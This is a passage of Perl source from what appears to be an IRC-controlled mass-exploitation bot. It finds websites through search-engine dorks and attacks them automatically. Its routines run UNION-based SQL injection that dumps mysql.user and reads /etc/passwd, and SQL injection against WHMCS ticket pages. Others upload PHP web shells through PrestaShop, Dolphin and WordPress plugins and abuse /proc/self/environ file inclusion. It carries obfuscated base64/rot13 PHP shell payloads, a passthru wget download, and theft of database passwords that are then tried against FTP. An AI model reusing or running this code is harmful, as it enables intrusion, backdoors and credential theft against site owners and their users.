=~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) { &sqlbrute($sqlsite,$chan,$engine);sleep(1); } } } } sub sqlbrute() { my $site=$_[0]; my $chan =$_[1]; my $engine=$_[2]; my $columns=20; my $cfin.="--"; my $cmn.= "+"; for ($column = 0 ; $column < $columns ; $column ++) { $union.=','.$column; $inyection.=','."0x6c6f67696e70776e7a"; if ($column == 0) { $inyection = ''; $union = ''; } $sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin; $response=get($sql); if($response =~ /loginpwnz/) { $column ++; $sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0".$union.$cfin; &msg("$chan","1,1".&rainbow("$sqllogo $engine <=> SqL <=>")."15 $sql "); $sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin; $response=get($sql)or die("[-] Impossible to get Information_Schema\n"); if($response =~ /loginpwnz/) { $sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin; &msg("$chan","1,1".&rainbow("$sqllogo $engine <=> INFO_SCHEMA <=>")."15 $sql "); } $sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin; $response=get($sql)or die("[-] Impossible to get MySQL.User\n"); if($response =~ /loginpwnz/) { $sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin; &msg("$chan","1,1".&rainbow("$sqllogo $engine <=> USER <=>")."15 $sql "); } while ($loadcont < $column-1) { $loadfile.=','.'load_file(0x2f6574632f706173737764)'; $loadcont++; } $sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin; $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n"); if($response =~ /root:x:/) { &msg("$chan","1,1".&rainbow("$sqllogo $engine <=> Load File <=>")."15 $sql "); } foreach $tabla(@tabele) { chomp($tabla); $sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get tables\n"); if($response =~ /loginpwnz/) { $sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin; &msg("$chan","1,1".&rainbow("$sqllogo $engine <=> Tabel <=>")."15 $sql "); &tabelka($site,$tabla,$chan,$engine); } } } } } sub tabelka() { my $site =$_[0]; my $tabla =$_[1]; my $chan =$_[2]; my $engine=$_[3]; my $cfin.="--"; my $cmn.= "+"; chomp($tabla); foreach $columna(@kolumny) { chomp($columna); $sql=$site.$cmn."and".$cmn."1=2".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get columns\n"); if ($response =~ /loginpwnz/) { &msg("$chan","1,1".&rainbow("$sqllogo $engine <=> SQLi Vuln <=>")."15 $site 4[9Kolom4]15 $columna 4[9Tabel4]15 $tabla "); } } } sub wh_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$whlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$whlogo $engine Done ")); } my $meja = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,concat(0x56695661,subject,0x4279726f65),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from tblemailtemplates where name like "; my $mjc = $meja."CHAR(37,72,111,115,116,105,110,103,32,65,99,99,111,117,110,116,37) limit 0,1--"; my $mjv = $meja."CHAR(37,68,101,100,105,99,97,116,101,100,37) limit 0,1--"; my $sql1 = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,"; my $sql2 = ",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0#"; my $test = $sql1."(select concat(0x6c6f6265204279726f65))".$sql2; my ($lobecp,$lobevps); if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { my $coba = &wsqlx($site."viewticket.php",$test); if ($coba =~ /lobe Byroe/) { my $looks = &wsqlx($site."viewticket.php",$mjc); if ($looks =~ /ViVa(.*?)Byroe/){ $lobecp = $1;} my $looks2 = &wsqlx($site."viewticket.php",$mjv); if ($looks2 =~ /ViVa(.*?)Byroe/){ $lobevps = $1;} my $cpanel = $sql1."(select concat(0x56695661,count(message),0x4279726f65) from tblemails where subject = ".&char($lobecp)." limit 0,1)".$sql2; my $vps = $sql1."(select concat(0x56695661,count(message),0x4279726f65) from tblemails where subject = ".&char($lobevps)." limit 0,1)".$sql2; my $hasil = &wsqlx($site."viewticket.php",$cpanel); my $hasil2 = &wsqlx($site."viewticket.php",$vps); my ($croot,$vpsx); if ($hasil =~ /ViVa(.*?)Byroe/){ $croot = $1; if ($croot > 0) { &msg("$chan","1,1".&rainbow("$whlogo $engine <=> Possible ").$croot.&rainbow(" cPanels from <=> ")."9http".$site."viewticket.php 4|15 $lobecp "); } } else { &msg("$chan","1,1".&rainbow("$whlogo $engine <=> SqLi Vuln <=> ")."8http".$site."viewticket.php "); } if ($hasil2 =~ /ViVa(.*?)Byroe/){ $vpsx = $1; if ($vpsx > 0) { &msg("$chan","1,1".&rainbow("$whlogo $engine <=> Possible ").$vpsx.&rainbow(" VPS from <=> ")."9http".$site."viewticket.php 4|15 $lobevps "); } } } } exit; } } } } sub char() { my $str = $_[0]; my @strs = split(//,$str); my @list; foreach my $string(@strs){ my $hex = unpack("C*",$string); $hex .= ","; push (@list,$hex); } my $res = "CHAR(".join(" ",@list).")"; $res =~ s/,\)$/\)/; $res =~ s/ //g; return $res; } sub wsqlx() { my ($url,$code) = @_; my $aplod = LWP::UserAgent->new; $aplod->timeout($timot); my $res = $aplod->post("http".$url, Content => $code); my $hasil = $res->content; return $hasil; } sub ftp_connect { my $host = $_[0]; my $user = $_[1]; my $pass = $_[2]; my $chan = $_[3]; my $logo = $_[4]; my $debug = $_[5]; my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { &msg("$chan","1,1".&rainbow("$logo FTP ")."15[ 8http://".$host." 15] [ 8".$user." : ".$pass." 15] 9Success "); } else { if ($debug == 1) { &msg("$chan","1,1".&rainbow("$logo FTP ")."15[ 8http://".$host." 15] [ 8".$user." : ".$pass." 15] 4Denied "); } } } sub presta_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$prestalogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$prestalogo $engine Done ")); } foreach my $bugs (@bugpresta) { (my $path = $bugs)=~ s{/[^/]+\z}{}; if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { my $aplod = LWP::UserAgent->new; $aplod->timeout($timot); my $req = $aplod->post("http".$site.$bugs,[ 'userfile' => ['./bad.php' => 'bad.php' => 'application/octet-stream'], ], 'Content-type' => 'form-data' ); my $hasil = $req->as_string; if ($hasil =~ /success:bad(.*)/) { &msg("$chan","1,1".&rainbow("$prestalogo $engine <=> Exploiting")."9 http$site"); my $file = $1; my $shell = "http".$site.$path."/slides/bad".$file; my $check = &get_content($shell); if ($check =~ /sEm - eXploit/){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$prestalogo-[$engine]- sHeLL")."9 $shell 15SafeMod=$safe $os uid=$uid "); } else { &msg("$chan","1,1".&rainbow("$prestalogo-[$engine]- Shell Upload Failed ")); } } } exit; } } } } } sub presta2_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$prestalogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$prestalogo $engine Done ")); } (my $path = $bug)=~ s{/[^/]+\z}{}; if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { my $aplod = LWP::UserAgent->new; $aplod->timeout($timot); my $req = $aplod->post("http".$site.$bug,[ 'userfile' => ['./bad.php' => 'bad.php' => 'application/octet-stream'], ], 'Content-type' => 'form-data' ); my $hasil = $req->as_string; if ($hasil =~ /success:bad(.*)/) { &msg("$chan","1,1".&rainbow("$prestalogo $engine <=> Exploiting")."9 http$site"); my $file = $1; my $shell = "http".$site.$path."/slides/bad".$file; my $check = &get_content($shell); if ($check =~ /sEm - eXploit/){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$prestalogo-[$engine]- sHeLL")."9 $shell 15SafeMod=$safe $os uid=$uid "); } else { &msg("$chan","1,1".&rainbow("$prestalogo-[$engine]- Shell Upload Failed ")); } } } exit; } } } } sub dolphin_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$dolphinlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$dolphinlogo $engine Done ")); } my $h1 = "---------------------------"; my $h2 = 'Content-Disposition: form-data; name="submit_upload"'; my $h3 = 'Content-Disposition: form-data; name="csrf_token"'; my $h4 = 'Content-Disposition: form-data; name="module"; filename="0x4148.zip"'; my $h5 = 'Content-Type: application/zip'; my $evil = "PK\x03\x04\x0a\x00\x00\x00\x00\x00RanIj\xf0\xfdU1\x00\x00\x001\x00\x00\x00\x0c\x00\x00\x000x4148fo.phpPK\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00RanIj\xf0\xfdU1\x00\x00\x001\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x00\x00\x00\x00\x00\x00\x000x4148fo.phpPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00:\x00\x00\x00[\x00\x00\x00\x00\x00"; my $body = "$h1--\r\n$h2\r\n\r\n0x4148\r\n$h1--\r\n$h3\r\n\r\nAint give a shit about csrf stuff ;)\r\n$h1--\r\n$h4\r\n$h5\r\n\r\n$evil\r\n$h1----\r\n"; my $conle = length($body); my $vuln = "http".$site.$bug; my $cekftp = $vuln; $cekftp =~ s/http:\/\///; $cekftp =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { my $inject = &dolphin($vuln,$body); if ($inject =~ /HTTP\/1.1 200 OK/) { my $tes = &dol_query("http".$site,'echo "lobe:OS: ".php_uname()." lobex";'); if ($tes =~ /lobe:OS: (.*) lobex/) { $os = $1; my $shell = "http".$site."rainbow.php"; my $shell2 = "http".$site."tmp/rainbow.php"; &dol_query("http".$site,'passthru("wget $injector -q -O ../rainbow.php");'); &dol_query2("http".$site); my $check = &get_content($shell); my $check2 = &get_content($shell2); if ($check =~ /sEm - Xploit/){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$dolphinlogo $engine <=> SheLL ")."9$shell 15SafeMod=$safe $os uid=$uid "); } elsif ($check2 =~ /sEm - eXploit/){ my ($safe,$os,$uid); if ($check2 =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check2 =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check2 =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$dolphinlogo $engine <=> SheLL ")."9$shell2 15SafeMod=$safe $os uid=$uid "); } else { &msg("$chan","1,1".&rainbow("$dolphinlogo $engine <=> ")."8http$site 15[OS: $os] "); } my $user = &dol_query("http".$site,"include('../inc/header.inc.php'); echo \$db['user'];"); if ($user =~ /_/) { @userz = split(/_/,$user); $user = $userz[0]; } my $pass = &dol_query("http".$site,"include('../inc/header.inc.php'); echo \$db['passwd'];"); #&msg("$path","1,1".&rainbow("$dolphinlogo FTP <=> Checking $host | $user : $pass ")); &ftp_connect($cekftp,$user,$pass,$chan,$dolphinlogo,0); } } } exit; } } } } sub dol_query() { my $target = $_[0]; my $code = $_[1]; my $browser = LWP::UserAgent->new; $browser->timeout($timot); my $res = $browser->post($target."tmp/0x4148fo.php",['0x4148'=> encode_base64($code)],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub dol_query2() { my $target = $_[0]; my $code = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVXA2WXRzMkVQN2NBUGtQU2phRmVUUzJsSEVyQ3NYTzJqbk9FcXlKTzl2WlBpU0ZJRmkwelZNU0JZcXE2d2I5NzdzakpiLzB2VktOeEtMdS9SNGVqM1FlelNWbk9wMjVRWlBkblVFaXNqdERQT215MGZsZ09PNWRqK0dpTjdodk1FcDgybkptcldiZmFCZUxVdnM5U2tYTHA1NFdLUy9ha1ZuZFZpSjA3aUppVWpMVFBOTmhtU2N5akF2MzBEczRaYjFRYXNxVkNwVjFVcUVxVFNncld6eWRKRHg2djhsMDdBU2RGMjJaWTlETG5HcVo1dSswR3hXRmJqeDV0V2xxMmdYUGI3aWZvdlhXTkZsU3N2U0I5WEdwQkVwanhSZDVINnEzZlZWeUpvczhqUGp4VWFxWUt6K1RHVDhHbzF1STk5dy9hNWEvTzRaV0dOM05sQ3l6R0lOQnBQSWZuWmxDSlRsV2tPOUNjUkovMk4xczlESmNaV2dBOTdzN0QyVk1DQzF4NW9lVFR5YWw1c2RWV2ZoSCs0ZWVoNGJ4V3N2Y1A3TExoWWoxM0g5Slp1WmN6T2JhZjIxSHNkKzNVUmJ6YXY0QnZhU2htb21zVXRwajlHdURvb3hGVXF0ZURqM3pOcEZOeTlTSHNOUmxVS01tWXBreFRrbWtDaHJRWnBFQjVpRnZhK1JzUXAvMmJjVGR4UG5iTUtPQ2ZNdlZOSkdMU0NBZmRjOTFXQzExRm01bDRXd2JMaFlXRGlDWXJVV3JVbnZ1R2toYzRXMGk0eVhSYi9FV1VkeHlhU3ZZVm5TaTdMOE9zWkRBQU4xeUI1NzNtSUhOcnNzOHFpQ0Fqa25tVnF2NHhFc0tFekhMdWl6Q1RlV0tUcFNFVXRGeU5tK3lXblRoY1F4OWF3R1hZd2kvd1RrTTRCcUdNTUx2Sy9nYi93ZndIMzVxWEN2YlpORXNmcU1ENDlJMVB2Rk8wWmxaeVB2WFQ0V0lKd2toS3JKTWx4MUpzV0pUWXVQZjNhSHppbVA5VGc3K3lPZjU3ZzZlTHFrQ3hXYXBOS28zdkNieXhSUWFEMUpFWTkzWUMxUDkwZWh2WTJqaldjSTM0WjN6dXRsOGdCdXo5MGxnTlZSckNqUm53VkNsdlFXZjRKSVVodi8yaHpmc2ZEeCtGWndQVTNEMm10Z2llN1BGSHZiL3VlNlB4c0gxOE1JSzBINmhCQXZqRUpadU5nUFU0SkdHMjR4Wmt6NGpzU0tjOHRTTE9ZbytGNWtJY3hpbFVNUWdsVEZxU2ZHdkJKdGp2MHJ3Q0t0Q0w5SDg2TVZNUDdnY25QYlJ3T0RzakIxdzhmQ2s0RitSdWs4aDQ1cXJIQ0ZVajJaTTZNa3lDMGJlUzNMazJIVHc0dlJuaURCSU9mTTdMUlVhK1pMU3NIODVHUGMzbE5KREpBM0g1aTVJeGhmUGRGR2ljK25zQXpNd3NYMXBIaFlpZ1Q5MlFzSU1xaFpiQTRXUTFibmNjeGV2WU1RVm5qT0MzNlpqbXdGRkx5b2ZWYTREY2lic1F2YTgydUkxUlo5VlBHeHZJQkxUVTEwM2YvWEhOMEdVWUF1bG1xR1NLYkFEVVh5ekNKeEVZbXZ4ZHh5Y1hienNYNzI0N0R1bUVHOWVkUUhkdGRUcG9HcDkyYjhhQjhQQllPeThZVE82TUZFV0pTV0swcm9RZHA3d05razBsWWppRm5EclloK3N3YVphNEJmV2ovOWQ5ZVBiK2s0aHVqUk1WQXVONTdydUVEM3NCcWU0SHVLQk53enFXWlJSSlZyZER1ank2UjZDNllYZFZNL01Cd1ZDUzN2bHNzMnduNnlVOTVBWWxBVzFod1o0Y0lZQkVoQVdlb2lOYzVzMXY5ZkhOU3BnRGlWb1E3S1VMbVNKRmtrdTJneHplT2JzY09aelM5L2xqL1lPSFRMYXphQTBPOW5jTmpNdHM0Z3VSY2dYNkl5dWliMTFFZHN6RmhISkZ1SmUyUzIwUld2dE5vaS83N2lPcVZERGJWVzhoSFNHMVhrZEVGQmtYYW9NaU5KVDRXMXc3emZvcHNncit1ZGMzTjcraUErVS9yS1R5aEZPNWlCeEtvV1VUUWdpL1lwdEtvUUdneTdidU5DK0NubENwbmFJczVBUEJsaVI1YVhlR0pzWUVOUnJzYVV4MithT3lsWXExbng0aHNIYk1Dbk4reDNLdXhUZ2lXYThDbXNkRWdiT1pMK01xYlJadE1oUXBZMThLdzVvU3lkRmRGVEpmU09UZURNaXdwbFZhNTJOV0FwYmJzOVNIUE9zQ3Jxd0tYa0pXVmJkc3FsRjZaVklMcDk5SjZRNDJFQklybCtJZ3BDMTZnZS9TczZ3bzlPaUhoMW51S1ZnSTYzSGlvbGU0WG1UM29KdG85a1NkemVPU0s3YnJaMmtjRTU5UDE4Zmk0ZDdKbzVOcHdvSGxlNE53N1IwNnNlakc2Zkd4V3lOWlZQSWxIT0tVRnRncmZNNElJSEdkRWhubWdkSkRYdndLcHEyWkVZRjgxaFpSTGEydGRTVmdmY2xqNmxJZkFEYm1tNkxQeXFqaUJjRmRTUzFQemFIL2N3L0JXa01IOHdCL0FUazZnRFVLT05zTVpCSXpEUTJha3ZWNldYRk4xam9xQzRoejN5d2Z4ZG1ITjBDL281VURiSnhHcDB0SXBkbjJVbTMyYjVNMDJnSXNvcHV6ZmpaRU9RUHhhQ21hQWgzaWdIUWN3WG1zckcvNVFxOGU5b3UvdUg3Ujh4WEZkSk9ON2Ruc3c0UU5UY0hDL2lKcUoya2dFa1NPcDhOM0k2NmxUUDh4VHFWRXVkcE0xL0g5WmpzU1dieWJlYTJNems5cXg4UlNRME4vZzg9IikpKTsKJGZpY2hpZXIgPSBmb3BlbigncmFpbmJvdy5waHAnLCd3Jyk7CmZ3cml0ZSgkZmljaGllciwgJGMpOwpmY2xvc2UoJGZpY2hpZXIpOw=="; my $browser = LWP::UserAgent->new; $browser->timeout($timot); my $res = $browser->post($target."tmp/0x4148fo.php",['0x4148'=> $code],'Content-type'=>'form-data'); my $hasil = $res->content; return $hasil; } sub dolphin() { my $url = $_[0]; my $body = $_[1]; my $vuln = $url; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ($query eq "") { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp", Timeout=>$timot) or return; my $sget = "POST $query HTTP/1.1\r\n"; $sget .= "Host: $host\r\n"; $sget .= "Referer: $vuln\r\n"; $sget .= "Cookie: memberID=1; memberPassword[]=0x4148;\r\n"; $sget .= "Content-Length: 557\r\n"; $sget .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"; $sget .= "User-Agent: Mozilla 15\r\n"; $sget .= "Content-Type: multipart/form-data; boundary=---------------------------\r\n\r\n"; $sget .= $body; print $sock $sget; my @pages = <$sock>; $page = "@pages"; close($sock); }; return $page; } sub testi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$testilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$testilogo $engine Done ")); } if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { my $aplod = LWP::UserAgent->new; my $req = $aplod->post("http".$site.$bug,[ "testimonial_submitter_name" => "lobex", "testimonial_title" => "lobex inside", "testimonial_main_message" => "lobex inside", 'testimonial_img' => ['./bad.php' => 'bad.php' => 'application/octet-stream'], "testimonial" => "Submit Testimonial", ], 'Content-type' => 'form-data' ); my $hasil = $req->as_string; if ($hasil =~ /Your testimonial was submitted successfully/) { &msg("$chan","1,1".&rainbow("$testilogo $engine <=> Exploiting")."9 http$site"); my $shell = "http".$site."upload/slides/bad.php"; my $check = &get_content($shell); if ($check =~ /sEm - eXploit/){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$testilogo-[$engine]- sHeLL")."9 $shell 15SafeMod=$safe $os uid=$uid "); } else { &msg("$chan","1,1".&rainbow("$testilogo-[$engine]- Shell Upload Failed ")); } } } exit; } } } } sub mmfc_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$mmfclogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$mmfclogo $engine Done ")); } if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $aplod = LWP::UserAgent->new; my $res = $aplod->post("http".$site.$bug,['fileToUpload' => ['./xxx.php' => 'xxx.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); my $hasil = $res->content; my $vpath = "wp-content/plugins/mm-forms-community/upload/temp/"; if ($hasil=~ /has been successfully uploaded/){ my $filexxx; if ($hasil=~ /filename: \'(.*)php/){$filexxx = $1;} my $shell = "http".$site.$vpath.$filexxx."php"; my $check = &get_content($shell); if ($check =~ /sEm - eXploit/){ my ($safe,$os,$uid); if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;} if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;} if ($check =~ /uid=(.*?)gid=/){$uid=$1;} &msg("$chan","1,1".&rainbow("$mmfclogo-[$engine]- sHeLL")."9 $shell 15SafeMod=$safe $os uid=$uid "); } } } exit; } } } } sub lfi_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$lfilogo $engine Done")); } my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../"; my $test = "http".$site.$bug.$dir."/proc/self/environ%0000"; my $shell = "http".$site.$bug.$dir."/tmp/lobex%0000"; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) { &msg("$chan","1,1".&rainbow("$lfilogo $engine exploiting")." 15http$site "); my $res = lfi_env_query($test); # &lfi_spread_query($test); if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS/) { my $os = $1; my $uid = $2; my $lficheck = &get_content($shell); if ($lficheck =~ /sEm eXploit/){ &msg("$chan","1,1".&rainbow("$lfilogo $engine SheLL <=>")."9 $shell 15(OS=$os) $uid "); } else { &msg("$chan","1,1".&rainbow("$lfilogo $engine Vuln <=>")."9 $site 15(OS=$os) $uid "); } } } } exit; } } } } sub lfi_env_query() { my $url = $_[0]; my $code = 'JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWxkUXVOVEZIMHVFdjl1bUZPeW93V0hla2gyQldScEtURWxkeUUwUWZvQ3lHWHNWaktMUGJaenhuRkd4SC92dlROcFZaYUYwbmZ6RXVmZVpyL09uTGxCOTNDNUtHcHFGRWFLRnlKRk9wYmFlaC92N2pBcEN4bFdTUlpGWmpGcUQ5SElkTVRkNDFjeDdiYWlNQWpEd2ZEeTJwbkduK003NTdiZC91RnVhcWRvenhYWFZrUUpXbnhsQ0U2dEpadkNJd2FNL2dwVDEvUjhQTDZLem9maG1ONmltNHZQVys1RThPY2tDTWZSY1RTd2dIYVJyZ0JPNHpRbXEwdk1DVkd3VVpNYmdha3huaUpaeFRPV0g2WU1vSis0NE5FY3VtZlFHT1ZTeXB4by8zaGdtenkwRkZncXlmVUswb2NuZEU1bk1ld0hrR0JyYVZPUEg0R0ZXYkZLUTVjQU1xV1pMSm4wb2VLaVEyMjZFbVRPM1BWUmp2Mk9RZnI5RWRCSHo4enVaeUVoeVZoT28rQnZPQTQyZ3ZLWWRDNjFzOE9oeEJJaVA4M1I2aVZTUWZjSk5WblJmVzBlSzU2UlgvRkxiMDRXVFpkVW5VSERGYkRXakdZakJrb2tjZktlYmlQMUZEZUNnR2hEbHdGbTB5czFuVDg3OXZxVW44aHRobXYzenJERWRHRWpuZCtDOGJXVGNZVmdLQnRIalNvcW1iQmFIVGpoNlhWak5ZN09CbjhFbHljWGdYQzBrREtsT2ZHZlEvM2g2ZVFpdUJ4VW8rRmo3Tnh0dExNc0Q3aFZzZ3FnK0t4clhuUE1BNW1qVnlTek5OdHQrOFFtZWRzQnZxT0VqdDRrb1NNcklRQWxpNExRcnVZNmNMMkorRjBVV0U0T1ZYVnRKK0dDY2t5M2NMMDRVZzJmRldQSkZQK2IrVCtScE1qZ3RINzhZRDY5N3JSVXZXaGFqMms3UnJCV0U5d0NjRWZCYnZ2VXBSNk1HSUVCYTlIRzZMWTkybjU0alFrRXdCQVZRbjJUS1YvQkkzRkxsL0FvbVQ4NTUxODdOOXR0UmowOFBDaFY4VGlqeWh4eWV6dk5yQktKaGtoVHlpVVVJNml0Y1puYWU1YWd5U3F4U1BsWFdFd1d5bEwvdnROa2pCQ05lQTk5R1JQRzFUNXJqdzdKWnlVRlRvc0g0T1p4SHpic1UrVzEvVnNsWVdIK1dBMUF2MXlrTG9TVU9VQ1p6RmFPZUFTWXZzSzlWMi9EZ1VKMjcyaFBRb3M4ajFMYUVOamxvcXcwMGF1UytVZXpMNW9TNU5pblZwN1NlbUpMV21iKzVMZHNLTG1QczhyOHZnTjhCenZyT2NmYm5USTRJSk1pcnpMTldHdmhHTnhPR3V1NDZid1pCNmY1bHhFbWNrbkVLVG5qR1ROd1p4RDllWm9GUWtZbTZtR1Y3WDBMTUlQNDJvM2F4SiswcnZuQmMzdTFpMWkyTk5GVWNiT0pqZnpJcG8xKy8xaGRWTEFsUGtPU2NiRkZ2bzYzQW5tVHRZOUI5WnBiTy9BV3ZSdXJGUm03YVhsanMxd3JFNUZsM1BMbDB4M1llSmsrbXBpNkhRaHRNQTZ6akdUN2h0ZEJVSWxtQ3pnRE1qck1pM3NXMmV3c2pSRGdmak5SNTNKeHcyRGpycnZ4V1ptNm1lK1NDcWUxZTZSRUJid2RUSXA3NFpIWVVsbTIvRzZWSlBEWGgzVXdiRituZytWbzFDZjBtRHlhMi9hTTVFMzBEY3RqVkF4eXRUTkN6UnVyWG5pbGNac0srcmxFMEtINXdMSkp1T01qOW9VbExuTXlXODJLcUlPeFovTVZXUDVVUlNkRzVDQ0xuUmNTZit6OUF3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcvdG1wL2xvYmV4JywndycpOwpmd3JpdGUoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTsK'; my $ua = LWP::UserAgent->new(agent => ""); $ua->timeout(7); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } sub dz_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$dzlogo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","1,1".&rainbow("$dzlogo $engine Done ")); } if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $aplod = LWP::UserAgent->new; my $res = $aplod->post("http".$site.$bug,['file_field' => ['./good.phtml' => 'good.phtml' => 'application/octet-stream']],'Content-Type' => 'form-data'); my $hasil = $res->content; my $vpath = "wp-content/plugins/dzs-videogallery/admin/upload/"; if ($hasil=~ /file uploaded/){ my $shell = "http".$site.$vpath."good.phtml"; my $check = &get_content($shell); if ($check =~ /sEm - eXploit/){ my ($safe,$os,$uid); if 